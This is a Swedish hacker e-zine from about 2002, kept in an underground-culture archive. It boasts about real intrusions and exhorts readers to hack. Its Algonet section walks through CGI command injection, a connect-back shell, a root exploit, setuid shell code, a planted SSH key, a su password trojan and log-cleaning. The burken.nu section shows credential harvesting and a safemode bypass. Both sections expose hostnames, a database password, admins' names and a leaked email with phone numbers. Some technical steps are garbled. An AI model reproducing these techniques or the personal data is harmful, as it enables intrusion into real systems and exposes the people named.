OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
.##. .####. .########. .#### ####. .######################. .#############################. .###### ######. .#### ###### ####. #### ######## ##### #### ######## ##### ###### #### ####### ########### ########### ########################## .###. .###. .###. +--------------------+ .###. .###. |THE CONSPiRACY: 0x01| .###. .###. +--------------------+ .###. .###. .###. .###. +--------+--------------------+--------+ .###. .###. 0n th3 m1ss1on 2 sch00l th3 und3rgr0und! .###. .###. +--------------------------------------+ .###. .###. (C)31337 TC / TheConspiracy - STFU FFS!! .###. .###. +--------------------------------------+ .###. .###. .###. .##################################################################. .####################################################################. ++ || || || +--------------------------+| |+--------------------------+ || +---++----------+[C0NTENT]+---------------------------+ | | | [0x01]-------> iNLEDNiNG!! | | [0x02]-------> h4cking ALGOnet f0r fun 4nd pr0f1t | | [0x03]-------> Hackare av idag | | [0x04]-------> Burken.nu blir fetgd | | [0x05]-------> the AUH manifesto | | [0x06]-------> Liten guide till ett skrare liv | | [0x07]-------> Mobbade barn med 0day exploitz | | | +---------------------------------------------+-------+ | | +----------------+------+ | WHITNEY WAS INNOCENT! | +-----------------------+ | | | | | | | | | | | +---+[0x01: iNLEDNiNG!! ]+--------------+-------------------------------------+> | Ni kanske trodde att den digitala underjorden i sverige helt hade somnat in och lmnat ver tronen till barnen p DALnet? Icke. Den svenska eliten har hllt sig tyst och i bakgrunden fortsatt att sprida 0ndska och kaos p de elektroniska motorvgarna. Nu r vi tillbaka fr att nnu en gng rra om i grytan och visa en annan sida av scenen n den du hittar p flashback och DALnet. Ni kanske trodde att internet var en sker lekstuga? Ni har hrt Joakim von Braun och Per Hellquist och alla andra experter uttala sig om hackers av idag. tror ni p det dom berttar? "Trots att virusangreppen kostar fretag och samhllet hundratals miljoner, r det f som vet hur srbart IT-samhllet r" sger Joakim von Braun, skerhetsrdgivare vid IT- skerhetsfretaget Symantec. TheConspiracy vet, vi lser nmligen hans epost. To: per.hellquist@symantec.com From: Joakim von Braun (joakim.von.braun@RISAB.SE) Subject: Re: Har du hrt ngot om? Date: 15 sep 2002 09:30:09 -0800 > Jag har tittat igenom det och > tror att det nog r bluff, men s har jag inte dina > kontakter bland hackers.. Jo, det r sant. Det r nog en bluff. Jag har tittat igenom allt material och kan inte se hur attacken skulle ha gtt till. Cheers Joakim Joakim von Braun phone +46-(0)8-428 95 05 von Braun Consultants cell phone +46-(0)709-56 16 42 Kristinehovsgatan 14 SE-117 29 Stockholm, SWEDEN The Trojan Database: http://www.simovits.com/trojans/trojans.html Vill du se ditt egna favvohack hr i zinet s bara maila in det. Detta frsta nummer innehller mycket material frn gruppen AUH, Arga Unga Hackare, 31337!! Vi slpper detta zinet endast fr att visa att vi har rtt och att alla andra har fel. mycket fel. Vi r hr fr att visa er nya vgen till framgng och fr att visa er som slutat vgen tillbaka! BRJA HACKA! VI VET ATT NI VILL! <-- OBS maila in dina loggar/trix till TheConspiracy@hushmail.com + | +---+[TheConspiracy staff]+-----+---+> | | | | +-----------------------------+-----------------------------------+ | '1/2', in fact, can never be found in the real world, | | and there are historical and archeological reasons to believe | | it was created by a Greek mathematician under the influence of | | the mind-warping hallucinogenic mushroom Amanita muscaria. | +----------------------------------------------------------+------+ | | | | +---+[0x02: h4cking ALGOnet f0r fun 4nd pr0f1t ]+------------+----------------+> | + S.. du vill hacka dig in p algonet sger du? Well, alla coola kidsen har varit dr, s varfr skulle du vara smre? Bunkra upp med knark och chips och ta p dig din finaste hackarskjorta fr nu skall vi p utflykt till ett nt som kommer ge flera av er nostalgiska trar i gonvrn. nmligen Algonet, eller Telenordia som det heter numera. Hur som helst s r dom jvligt gda och tur r vl det, annars skulle jag vara tvungen att skriva om hur du installerar mIRK eller formaterar en floppy eller ngon annat som hackare gr p sin fritid. Hackare har nmligen gott om fritid d de inte har ngra vnner, eller de f vnner dom har som lever sitt liv p mIRKen r fullt upptagna med att rka B0NG och skriva 0nd kod s dom har inte tid att umgs med loosers som du. Hr kommer det ni alla har vntat p: utan ytterligare ondig inledningstext: TheConspiracy presenterar stolt: RiktigtOndHackerSkola - del ett: +-----------------------------------------------------------------------------+ |!Hacking algonet for fun and profit!! (det r inte snyggt, men det r kul) | +-----------------------------------------------------------------------------+ Att hacka WEBBEN r vldigt populrt bland ungdomar nufrtiden. Har du precis som s mnga andra undrat hur snt dr egentligen gr till? Istllet fr att svamla om massa trams s tar vi ett praktiskt exempel! Vi skaffar oss helt enkelt fetroot p algonet genom ett hl i just WEBBEN. Fr att f fetroot mste man frst ha ett stt att bertta fr datorn i frga vad man vill att den skall utrtta. i vrat fall vill vi att den skall utfra 0nda hackarekommandon, ngot som datorer vanligtvis inte alls hller p med. Vi vet att Algonet tillter sina dumma anvndare att skriva sina egna CGIscript och eftersom vi ocks vet att de flesta av alla som anvnder en dator r dummare n sina floppydrives s kan vi kallt rkna med att flertalet av dessa CGIs gladligen tar vra hackarekommandon och skickar vidare till skalet. Vi anvnder en skmotor p WEBBEN fr att ska upp lite skripp och efter ngra minuter har vi hittat en anvndare som har rkt alldeles fr mycket B0NG och misslyckas fatalt med att skriva k0d som inte funkar som vi vill. vning ett: anvnd din webblsare fr att titta p www.altavista.com och ska efter CGI skript hos algonet. (search: +URL:algonet.se +URL:.cgi) Vi vljer ut ett offer och skrider till verket - Det r nu mycket viktigt att upprtthlla en hg knark/blod ratio i drorna, s ni inte pltsligt mitt i hacket rkar uppleva verkligheten, d denna kan vara skadlig och inte alls bra "http://cgi.algonet.se/xxx/visasida.cgi?page=main.html" Ja detta var fint, vi testar ngra 0nda kommandon fr att se att det verkligen fungerar som det ska, och det gr det. s ta ngra sista djupa bloss p B0NGen och stt dina bleka fingrar mot tangentbordet s skall vi ut p en trevlig resa. # # # # # # # # # # # # # # # # # # # OBS OBS OBS OBS OBS OBS OBS OBS # # # # Kids, dont try this from home!! # # # # OBS OBS OBS OBS OBS OBS OBS OBS # # # # # # # # # # # # # # # # # # # Nu nr vi skall begr BROTT s vill vi inte gra det frn mammas telelina eftersom hon d antagligen kommer bli sur och ta din fina Petium (MMX) ifrn dig Vi binder drfr en proxykedja till den lokala telnetporten och hoppas p det bsta. # telnet localhost Trying 127.0.0.1... Connected to localhost. # Det vi har hittat om ni fattar det, r ett CGIscript vi kan kra kommandon # genom! # Att sitta och skriva in URLer hela tiden r inte s kul, s vi hmtar vran # programming for dummies bok och lr oss hur man skriver ett skalskript som # utfr vra 0nda grningar. # $ cat > algo.sh #!/bin/sh while [ - ]; do echo -n ">" read BAR FOO=$(echo $BAR | sed -e 's/\ /%20/g') lynx -source "http://cgi.algonet.se/xxx/visasida.cgi?$FOO" done ^D $ chmod 755 algo.sh $ ./algo.sh >uname -a <HTMl><BODY><ISINDEX><PRE> SunOS sten 5.8 Generic_108528-08 sun4u sparc SUNW,UltraSPARC-IIi-cEngine >who <HTMl><BODY><ISINDEX><PRE> root console xxx xx xx:xx onm pts/1 xxx xx xx:xx (xena.algonet.se) > # # Vi mrker snabbt att vrat WEBB-skal r smre n Elvis, s vi anvnder # vra tokiga skillz fr att uploada lite warez till datorn s vi blir # klara i tid till nsta B0NG. Vi valde att ladda upp ett connectbackskal. # det r som telnet, fast tvrt om.. Och s behver du inga jobbiga lsenord # eftersom du r en hackare, och hackare anvnder inte saker som lseord. # >gcc cb.c -o cb >./cb xxx 80 # # Det hr kommer vara lite klurigt, du frstr att detta hnder lite fre, efter # och samtidigt som det ovanfr, vi har som alla riktiga IT brottslingar # minst tv terminaler igng, sen har vi en tredje som vi kollar p PORR i. # och en fjrde med mIRCK sklart. # men i vran andra(2) terminal, den som vi startade netcat i, fre vi krde # connectbackskalet, ser ut s hr: #nc -vvlp 80 listening on [any] 80 ... Warning: forward host lookup failed for stanley.algonet.se: Unknown host connect to [xxx] from stanley.algonet.se [194.213.75.184] 45204 id uid=xxx(xxx) gid=2000(algonet) # # Ok, vi som kan vran lunix ser snabbt att vi oturligt nog inte r # klara hr, vi har fortfarande inte fetroot fast vi har jobbat s hrt! # Vi ger oss ut bland dom lokala H/P/A BBSerna fr att hitta lite ny # 0dagars-warez som kan hjlpa oss lite p vgen. # gcc rt.c -o r00t; ./r00t id; uid=0(root) gid=2000(algonet) # # Ok pojkar och flickor(you wish), nu har vi fetroot, dock bara p en server. # Och det r inte ens en rolig server. Men varfr har vi slsat all denna tid # undrar ni nu. Det skall jag bertta. Algonet har nmligen alla anvndares # mappar och filer och snt p tv centrala datorer, som kallas Piff och Puff. # Du kanske kommer ihg namnen frn julafton nr du sitter och skrattar t # den dumma hunden som aldrig fr fast dom sm elaka rttorna. # Piff och Puff r s kallade NSF servrar, varfr det heter NSF servrar, eller # varfr algonet har dpt dom till Piff och Puff, som inte har ngot alls med # varken nazism eller data att gra, har jag verkligen ingen aning om. # Piff och Puff delar iallafall ut all denna data till de servrar som behver # den, det roliga med detta r att om vi skriver saker bland ngons databitar # p en server, s kommer det finnas dr p ALLA servrar!! Helt magiskt! # Det som vi kommer att tnka p frst r SSH-nyckelfiler, en liten sak som # gr att du kan vara hackare med SSH! Dvs utan att anvnda passwrdz. Om # vi lgger en sn bland en admins data, s kan vi logga in som honom p # alla Algonets servrar!! fattar ni vart jag vill komma? Bra. Ladda om B0NGen # och frbered din ssh-nyckelfil, s fortstter vi efter en tiominuter rast. # # cat > cid.c #include <stdio.h> int main(int argc, char** argv) { if(argc < 3) { setuid(0); setgid(0); seteuid(0); setegid(0); } else { setuid(atoi(argv[1])); setgid(atoi(argv[2])); seteuid(atoi(argv[1])); setegid(atoi(argv[2])); } execl("/bin/sh","sh",NULL); } # /usr/local/bin/gcc cid.c -o cid # # Eftersom man inte fr peta p andras filer fast man r tokroot r lite jobbigt # men ltt verkomligt, vi vill inte anvnda su fr att d fastnar man i massa # loggar som man inte riktigt vet vem som lser. Bst att vara frsiktig # Nu vidare! head -15 /etc/passwd root:x:0:1:Super-User:/:/sbin/sh qmaild:x:504:100::/var/qmail:/bin/sh qmaill:x:505:100::/var/qmail:/bin/sh qmailp:x:506:100::/var/qmail:/bin/sh qmailq:x:501:101::/var/qmail:/bin/sh qmailr:x:500:101::/var/qmail:/bin/sh qmails:x:502:101::/var/qmail:/bin/sh alias:x:503:100::/var/qmail/alias:/bin/sh www:x:101:100:AlgoNet Webmaster:/home/user2/www:/bin/tcsh onm:x:107323:1000:Ola Nystrom:/home/user10/onm:/usr/bin/zsh sshd:x:117444:66668:sshd privsep:/var/empty:/bin/false adh:x:99901:1000:Anders Haglund:/home/adh:/bin/tcsh anarchy:x:1400:1400::/import/usrusr/anarchy:/bin/false nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: # # Hmm, dr har vi adminsen p Algonet, trevligt.. Vi vljer en p mf # och fortstter vran utflykt. # ./chid 107323 1000 id uid=107323(onm) gid=2000(algonet) # ssh-keygem -t dsa Generating public/private dsa key pair. Enter file in which to save the key (/root/.ssh/id_dsa): knark Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in knark. Your public key has been saved in knark.pub. The key fingerprint is: 12:b9:79:f7:bc:77:92:f2:25:94:33:68:90:7b:2b:32 root@3v1l cat >> .ssh/authorized_keys < _EOF_ -----BEGIN DSA PRIVATE KEY----- MIIBuwIBAAKBgQDE4836KtFl/kwJsJensnvYgjdPHSixvT68oJ8n23TZgf74PTdI MXGsXtcNds9snH6K9vtWMd+0alm9/f1IlzxQLihN2ToXFIMyPRmaeDFP6T1wb0L/ uYYa1xrWbDDWJjB737K4XuWo+coJgYdvo+xzjH05AGRE2yIx/iJk6pyWPQIVAIZt VeO5HSGceET3IAQ21YBJxtn1AoGAdLC6QAFx4t4Y5pTbCkhVq3/LcPaGL8mEPl3A 4d+IIpLlW+G9sPWxgwQHFLSR061oHcZ7EwquChUyN7FMF59qTEL1KzsZ+rqqShcv tQZ4T8J44fGVqE4Pw3AJAOtqDbWEY5gK0HQhYBW73SGQV7QFJ8Otxn8MI5DD4/K+ LRw0HakCgYEAu53P58hUzTABUdbZxwC8Zn6+FEa/XXa0UxxiCx1ZJGYjH+vM+Yow EtgVVgxY6pOw/Ltyd2hTi+4dGiNqtmqiNHXxuYm0cvhELth/R9NwYBpBxTGd2RCt /qt/O7F9T7Vl2DZxAkoe0FkcX5T1WXGwLyXjAdA0avbRomUBWBRbcfMCFBaRBcj+ dmrfJ63FAQbiKoKHpKtg -----END DSA PRIVATE KEY----- _EOF_ # # Hihi, En elak liten present vi lmnade hr :-) # Nu brjar vran resa nrma sig sitt slut, # Hoppas ni hnger med s hr lngt! # Vi mste ju testa att vran plan fungerar, s # vi startar ytterligare en terminal, hoppar lite # kors och tvrs ver ntet p vra tokrootade burkar # och frsker slutligen logga in, h0h0 # ssh -i knark onm@kairos.algonet.se The authenticity of host 'kairos.algonet.se (213.150.135.237)' can't be established. RSA key fingerprint is 53:e6:bd:e2:b9:bb:5b:a0:ea:59:b4:17:1d:f8:9f:98. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'kairos.algonet.se,213.150.135.237' (RSA) to the list of known hosts. Last login: Fri Sep 6 10:39:43 2002 from xena.algonet.se Sun Microsystems Inc. SunOS 5.8 Generic February 2000 Skriv "meny" om du vill starta det lokala menysystemet. [kairos/onm] ~ > id uid=107323(onm) gid=1000(stuff) [kairos/onm] ~ > # Nu r r jobbet att bli root p alla kvar. # Men det lmnar jag till er lsare sjvla att # lsa! men jag skall ge er ngra tips s ni inte str # dr helt med skgget i brevldan! # # Frst kan man tnka att ven piff och puff, du vet dom # tv rttservrarna som innehll alls filer och dokument? # dom kan man ocks logga in p med nyckelfilen! # # Ett annat stt r att cracka rootlsenordet vi hittade p sten o stanley. # det lter som en ganska trevlig ide tycker jag, men sjlv s r jag fr lat # cracka och vill bli klar s snabbt som mjligt s jag kan dra och kpa mer # sprit och piller. S jag planterar en su trojan i hans hemkatalog och aliasar # su till den, Bakdrren skickade vidare username och password till su s han # loggades in som root som vanligt, men lsen loggas!! muahaha! elakt va? # det firar vi med ett bloss p B0NGen och stor klunk vodka. # Nu har vi rootlsen till alla burkar han krde su p, bla kairos! # en mycket bra sak att ha! # # Vi har stdat upp alla verktyg/loggar/bakdrrar som vi anvnde # fr att ge er en chans att f fetroot p algonet alldeles sjlva! # Ja det var roligt, eller hur? N? vad vntar ni p? Brja hacka! # men glm fan inte att stda i loggarna efter er nu! # # Kom ihg! # # SANT --> VILL MAN BLI HACKER S MSTE MAN HACKA! <-- SANT! # SANT --> VILL MAN BLI HACKER S MSTE MAN HACKA! <-- SANT! # SANT --> VILL MAN BLI HACKER S MSTE MAN HACKA! <-- SANT! # SANT --> VILL MAN BLI HACKER S MSTE MAN HACKA! <-- SANT! # # - TC - sch00ling th3 und3rgr0undz # # PS. Fr er som inte orkar hacka sjlva s finns hr ssh-nyckelfilen!!! -----BEGIN DSA PRIVATE KEY----- MIIBuwIBAAKBgQDE4836KtFl/kwJsJensnvYgjdPHSixvT68oJ8n23TZgf74PTdI MXGsXtcNds9snH6K9vtWMd+0alm9/f1IlzxQLihN2ToXFIMyPRmaeDFP6T1wb0L/ uYYa1xrWbDDWJjB737K4XuWo+coJgYdvo+xzjH05AGRE2yIx/iJk6pyWPQIVAIZt VeO5HSGceET3IAQ21YBJxtn1AoGAdLC6QAFx4t4Y5pTbCkhVq3/LcPaGL8mEPl3A 4d+IIpLlW+G9sPWxgwQHFLSR061oHcZ7EwquChUyN7FMF59qTEL1KzsZ+rqqShcv tQZ4T8J44fGVqE4Pw3AJAOtqDbWEY5gK0HQhYBW73SGQV7QFJ8Otxn8MI5DD4/K+ LRw0HakCgYEAu53P58hUzTABUdbZxwC8Zn6+FEa/XXa0UxxiCx1ZJGYjH+vM+Yow EtgVVgxY6pOw/Ltyd2hTi+4dGiNqtmqiNHXxuYm0cvhELth/R9NwYBpBxTGd2RCt /qt/O7F9T7Vl2DZxAkoe0FkcX5T1WXGwLyXjAdA0avbRomUBWBRbcfMCFBaRBcj+ dmrfJ63FAQbiKoKHpKtg -----END DSA PRIVATE KEY----- | +---+[TheConspiracy hakker crew]+---+-----------------------------------------+> | | +-------------------+------------------------------+ | Kommer mnskligheten att g under eller g ver? | +------------------------------------------------+-+ | | <+---------------------------------------------------------------+------------+> # telnet eleet.navy.mil Connected to eleet.navy.mil. Escape character is '^]'. ***************************************************************************** *** WARNING *** *** WARNING *** *** WARNING *** *** WARNING *** This is a Department of Defense computer system. This computer system, including all related equipment, networks and network devices (specifically including Internet access), are provided only for authorized U.S. government use. DoD computer systems may be monitored for all lawful purposes, including to ensure that their use is authorized, for management of the system, to facilitate protection against unauthorized access, and to verify security procedures, survivability and operational security. Monitoring includes active attacks by authorized DoD entities to test or verify the security of this system. During monitoring, information may be examined, recorded, copied and used for authorized purposes. All information, including personal information, placed on or sent over this system may be monitored. Use of this DoD computer system, authorized or unauthorized, constitutes consent to monitoring of this system. Unauthorized use may subject you to criminal prosecution. Evidence of unauthorized use collected during monitoring may be used for administrative, criminal, or other adverse action. Use of this system constitutes consent to monitoring for these purposes. *** WARNING *** *** WARNING *** *** WARNING *** *** WARNING *** ***************************************************************************** login: toor Please wait...checking for disk quotas RESTRICTED RIGHTS LEGEND Use, duplication, or disclosure by the U.S. Government is subject to restrictions as set forth in sub-paragraph (c)(1)(ii) of the Rights in Technical Data and Computer Software clause in DFARS 252.227-7013. Rights for non-DOD U.S. Government Departments and Agencies are as set forth in FAR 52.227-19(c)(1,2). Value of TERM has been set to "xterm". WARNING: YOU ARE SUPERUSER !! # <+---------------------------------------------------------------+------------+> | | | +---+[0x03: elaka MMX hackare av idag ]+-------------------------+------------+> Whitehats. Blackhats. Greyhats. Smaka p dessa mediaord. Ni har antagligen lst dessa ord bde en och tv gnger och kanske till och med trott att ni varit kapabla att applicera dem p folk ni knner eller har lst om Whitehats - de fr en att associera till vita nglar, moralens vktare. Blackhats - de r motsatsen, onda nglar. Hnsynslsa nglar helt utan skrupler. En greyhat r ngon slags vilsen whitehat, ngon som inte alls har fattat grejjen och tror sig kunna st med ett ben p varje sida. Orden r beskrivningar phittade av media i slutet av 90-talet fr att kunna dela in dessa s.k. hackare man skrev om i olika lger. Ordet hackare har ju alltid varit svrt. Vad r egentligen en hackare? Hur beter dem sig? Osv.. En myt r att riktiga hackare r sdana typer som MIT-hackarna. Det r lgn. MIT-hackarna var nrdar utan liv med lg imponansfaktor. Sen kom man p att hackare kanske var sdana typer som brt sig in i datorsystem. Fast dr sttte man ocks p problem. Det gick helt enkelt inte att kategorisera bda typerna som hackare. Dvs, typerna som brt sig in i system fr att det var kul och vars enda avsikt var att att kncka systemen (yeah, right), och typerna som brt sig in fr att stjla information eller vad som helst som inte r helt frsvarbart. Den ena var ju en hackare och den andra en cracker. Och en cracker r ju en sn som kncker program? Fast egentligen r en cracker, dvs en ond hackare, en hackare? Massor med onyttig frvirring. Hr fanns det utrymme fr nya beskrivningar. Onda hackare kallades blackhats. Snlla hackare (haha) kallades whitehats. Snlla hackare som varit/r onda i smyg kallade man greyhats. Skitbra, helt pltsligt gick det att kategorisera hackarna. Nu blev det helt pltsligt dags fr alla s.k. hackare att kategorisera sig. De serisa mnniskorna, bl.a. de som jobbade fr Defcom eller ISS - de var sklart whitehats. Fr vem vill ha smuts p fingrarna om man ska slja sig som skerhetskonsult? Sen var det dom tuffa sm hackarna. De titulerade sig sklart blackhats. De hade rd att vara coola eftersom ingen kom att jobba med dem n. Men framfrallt ville de ha respekt och bermelse. Snt man kan f p IRC som r centrum fr alla jvla scenhoror. Till slut blev det en grupp ver, de som betedde sig likt blackhats p fritiden men jobbade likt whitehats p arbetstid. Dessa var greyhats. Lite vitt och lite svart. Ni sitter p IRC och jiddrar om vilken jvla hatt ni sjlv br och funderar ver vilken hatt folk ni hr om, folk ni lser om och folk ni trffar, frtjnar att bra eller br. Under tiden sitter vi och fetger era geekstations och snor er warez! Om ni ngonsin tycker att ni br nn slags hatt s r ni inga hackare. Det finns inget som definerar en hackare som whitehat, greyhat eller blackhat. Och det finns inga crackers, och inte heller onda eller goda hackare. Den som tar p sig NGON hatt r inte en hackare. Punkt slut. FR DET R JU S JVLA UPPENBART. HACKARE SOM INTE HACKAR R INGA HACKARE. ALLTS. HACKARE HACKAR! Samma sak med problemet huruvida man r 'l33t eller inte. Piece of k4k4. Det r ni inte och kommer ni aldrig att bli. Men fr all del, sitt grna dr och bli jmfrd med ngon som r snppet mer clueless som dig och knn dig elajt. MMX! (Sensmoralen i den hr texten r - Sluta jiddra, brja hacka.) + | +-----------------------------------------------------------------------+------> | | | +---+[0x04: burken.nu blir fetgd! ]+-----------------------------------+------> | +-----------------------------------------------------------+ | Att burken.nu blev hackad har vl knappast undgtt ngon | | och mnga teorier om "hur" har spridits. TheConspiracy | | har dock ftt den exklusiva mjligheten att hr terge | | hacket men hjlp av kta terminalloggar! | | Tyvrr fick vi strippa ner ordentligt eftersom vi har | | begrnsat utrymme i det hr zinet | | Credits till AUH fr detta =) | +-----------------------------------------------------------+ | Sent som fan - Torsdag Ey dagboksmannen! Idag knde jag fr att driva en nrdadmin till vansinne, s jag tnkte att jag skulle roota en shellserver. Ngonstans ska man brja, s jag drog mig till minnes ett mail i en mail- spool om loginuppgifter till Burken.NU. En shelltjnst dr man fr skal, irc, mysql, php och annan jvla webbskit. Kopplade upp mig mot en switch, loggade p ett gng andra burkar och gled sakta men skert in p burken(.nu) och tittade runt lite. Webbtjnsten ligger visst p en annan burk, kallad fs02. Alla hemkataloger r NFS-monterade med AMD. Mnga users r tuffa och har satt sin hemkatalog till chmod 711. Och i de andra finns det inte mycket att hmta. Inte heller ligger det ngra worldreadable backups i filsystemet med intressant information som kan vara till nytta fr anvndare med genuint ont uppst. Eftersom jag noterade att lsenorden fr login och mysql var samma i mailet lgger jag ihop ett och ett. (look m0m, i g0t d4 apr0pr1at3 sk1llz) Snabbt hackar jag ihop ett script som tvingar AMD att montera hemkatalogerna, gr in i dem, vidare in i public_html och plockar informationen i PHP-filerna som anvnds fr att komma t respektive mysql databas. Sen knackade jag ihop ett PHP-dokument som med IMAP verifierar alla anvndarnamn och lsenord jag ftt mot IMAP-servern - Till min frvning upptcker jag endast ett ftal har bytat bort de skra (kombinationsmssigt :P), slumpmssiga lsenorden mot egna. Det var ju dumt. Jag sitter nu p en hel del (ok, nstan alla) konton till Burken.NU. Jvla klantskallar. Jag ger, hahaha. Men nd, vanliga konton r faktiskt relativt meningslsa.. Varfr bry sig om grus nr man kan grva guld? Spacedump, en pojke p internet, r admin och tror att han kan gra som han vill. Men hller vi inte alla med om att han gr helt jvla fel nr han accessar sin sqldatabas med root-kontot som ligger i en 644 fil? mysql_connect("localhost", "root", "nattis"); LOL @ Spacedump - LOL @ Spacedump - LOL @ Spacedump - LOL @ Spacedump LOL @ Spacedump - LOL @ Spacedump - LOL @ Spacedump - LOL @ Spacedump LOL @ Spacedump - LOL @ Spacedump - LOL @ Spacedump - LOL @ Spacedump Greppar ut en anvndare p h, som i hackare, frn min coola kontolista och loggar p mot burken igen. Tnkte att det vore roligt att titta runt p webbservern ocks, s jag hackar ihop ett PHP-script som ska hitta p sattyg och andra ondheter. Tyvrr hade ngon slagit p safemode i PHP s det frsket gick t pipan. Men det r ingen ide att lipa fr det, s jag gr till php.net och lser p om hur safemode fungerar och vad parametrarna gr. Hittar ngot som verkar kajko och efter ngra frsk kan jag exekvera program som uid httpd. En terminallogg sger mer n tusen ord, s *fanfar*: +---------------------------------------------------+ |EDITOR note: Alla loggar r kraftigt editerade | | pga utrymmet. Men ni fattar nog nd. | | | | Nr loggen brjar har precis vr hacker skaffat | | sig terminalacess genom ett connectback skal som | | exekveras genom ett phpscript. | | Detta ser man mycket ofta, folk som tror dom r | | skra bara fr att deras anvndare inte har skal | | p just den datorn. | | DAX ATT VAKNA! SKT DITT JOBB ELLER BLI GD! | | | | Det r allts spacedumps wwwserver som visas. | | (burken.nu/www.linux.se/www.xmms.org/m.fl) | +---------------------------------------------------+ $ w 11:15pm up 14 days, 21:02, 30 users, load average: 0.66, 0.50, 0.48 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT spacedmp pts/1 fs01.spacedump.p 8Sep 2 13days 0.16s ? - spacedmp pts/2 laptop:S.0 Fri 3pm 25:58 50.48s 50.40s epic SpaceDump spacedmp pts/3 laptop:S.1 9:22pm 1:53m 0.06s 0.04s mysql -uroot -p spacedmp pts/4 laptop:S.2 Fri 3pm 2days 0.02s 0.02s /bin/bash spacedmp pts/5 laptop:S.3 8Sep 2 1:36m 7.41s 7.38s ssh -v -l root spacedmp pts/6 laptop:S.4 Fri 3pm 25:31 11.86s 11.85s /usr/apps/pine/ spacedmp pts/7 laptop:S.5 8Sep 2 1:23m 0.23s 0.11s telnet -x -l ro spacedmp pts/8 laptop:S.6 8Sep 2 34:26m 2.30s 2.18s ssh -v -l anol spacedmp pts/9 laptop:S.7 8Sep 2 3:49m 50:09 ? - spacedmp pts/10 laptop:S.8 Tue 3pm 22:19m 0.02s 0.02s /bin/bash spacedmp pts/12 laptop:S.9 8Sep 2 1:19m 26.61s 26.60s /usr/apps/opens spacedmp pts/13 laptop:S.15 Thu 6pm 3days 0.12s ? - spacedmp pts/15 laptop:S.11 5:12pm 6:01m 0.01s 0.01s /bin/bash spacedmp pts/16 laptop:S.12 5:46pm 5:28m 0.02s 0.02s /bin/bash spacedmp pts/19 laptop:S.16 Thu 6pm 1:10m 0.39s 0.36s mysql -uroot -p spacedmp pts/20 laptop:S.17 Thu 7pm 47:04m 0.18s ? - coopers pts/14 c-c88970d5.016-3 Wed12am 4days 0.09s 0.09s -bash spacedmp pts/17 laptop:S.13 Thu 2pm 3days 0.04s 0.04s /bin/bash spacedmp pts/21 laptop:S.18 Fri 8pm 37:37m 0.82s 0.80s /usr/apps/opens spacedmp pts/22 laptop:S.19 Sat12am 34:22m 1.41s 1.39s /usr/apps/opens coopers pts/24 c-c88970d5:S.0 10Sep 2 2days 7.97s 7.96s epic CoopSwip - $ cd /usr/web/logs $ ls -l total 1155916 -rw-r--r-- 1 root root 19163 Sep 22 23:11 123.shellkonto.nu-combined -rw-r--r-- 1 root root 0 Sep 16 00:00 123.shellkonto.nu-error_log -rw-r--r-- 1 root root 0 Sep 16 00:00 1st.shellkonto.nu-combined -rw-r--r-- 1 root root 0 Sep 16 00:00 1st.shellkonto.nu-error_log -rw-r--r-- 1 root root 961083 Sep 22 23:16 3d.burken.nu-combined -rw-r--r-- 1 root root 7354 Sep 22 22:43 3d.burken.nu-error_log -rw-r--r-- 1 root root 18637378 Sep 22 23:15 access_log -rw-r--r-- 1 root root 11794 Sep 22 11:55 apps.linux.se-combined -rw-r--r-- 1 root root 0 Sep 16 00:00 arkivet.tillberg.net-combined -rw-r--r-- 1 root root 1295 Sep 22 21:07 lindal.bilder.nu-error_log -rw-r--r-- 1 root root 0 Sep 16 00:00 link.tillberg.net-combined -rw-r--r-- 1 root root 4670744 Sep 22 23:03 se2.php.net-error_log -rw-r--r-- 1 root root 41994 Sep 22 17:51 www.h3rbie.com-combined -rw-r--r-- 1 root root 13803 Sep 22 12:43 www.tillberg.net-error_log -rw-r--r-- 1 root root 717 Sep 22 04:10 www.timrahalsostudio.burken.nu-error_log -rw-r--r-- 1 root root 7607 Sep 22 19:53 www.tracit.burken.nu-combined -rwxr-xr-x 1 root root 1090 Mar 29 2001 logcheck.sh +---------------------------------------------------------------------------+ | Ohyggligt lng lista p domnnamn dr. | | Vi kortade ned den ganska graftigt men killen har hand om en jvla massa. | +---------------------------------------------------------------------------+ $ cat logcheck.sh #!/bin/sh # Display syntax function dispsyntax { echo Usage: logcheck.sh \<logfile\> } # Check if we got an argument on the commandline if [ "$1" == "" ];then dispsyntax exit 1 fi # Check if the file exists if [ ! -f $1 ];then echo No such file... exit 1 fi # Get yesterdays date DATE=`date --date '1 day ago' +"%d/%b/%Y"` echo DATE: $DATE # Fetch the loglines from the file and put it in a temporary file egrep "^[^ ]* [^ ]* [^ ]* \[$DATE.*" $1 > /tmp/www.log # Get total number of hits from the logfile TOTALHITS=`wc -l /tmp/www.log | awk {'print $1'}` echo TOTALHITS: $TOTALHITS # Get hourly stats for i in `seq 0 23`;do HOUR=`echo $i | sed -e 's/.*/0&/' | sed -e 's,.*\([0-9][0-9]\)$,\1,'` HOURHITS=`egrep "^[^ ]* [^ ]* [^ ]* \[$DATE:$HOUR.*" /tmp/www.log | wc -l | awk {'print $1'}` echo $i - $HOUR: $HOURHITS done # Get minute stats for i in `seq 0 59`;do MINUTE=`echo $i | sed -e 's/.*/0&/' | sed -e 's,.*\([0-9][0-9]\)$,\1,'` MINUTEHITS=`egrep "^[^ ]* [^ ]* [^ ]* \[$DATE:12:$MINUTE:.*" /tmp/www.log | wc -l | awk {'print $1'}` echo $i - $MINUTE: $MINUTEHITS done $ pwd /usr/web/logs $ cd ../conf $ ls -alrt total 412 drwxrwxrwx 2 httpd httpd 4096 Nov 9 2000 RCS -rwxrwxrwx 1 httpd httpd 357 Feb 10 2001 srm.conf -rwxrwxrwx 1 httpd httpd 9986 Feb 10 2001 mime.types -rwxrwxrwx 1 httpd httpd 12441 Feb 10 2001 magic -rwxrwxrwx 1 httpd httpd 348 Feb 10 2001 access.conf -rw-r--r-- 1 root root 32532 Jun 3 2001 httpd.conf.old -rw-r--r-- 1 root root 23270 Jun 3 2001 virtualhost.conf.old -rwxr-xr-x 1 root root 32673 Apr 30 20:23 httpd.test.conf -rwxr-xr-x 1 root root 41060 May 1 18:35 virtualhost.test.conf drwxr-xr-x 18 root root 4096 Aug 5 15:18 .. -rwxrwxrwx 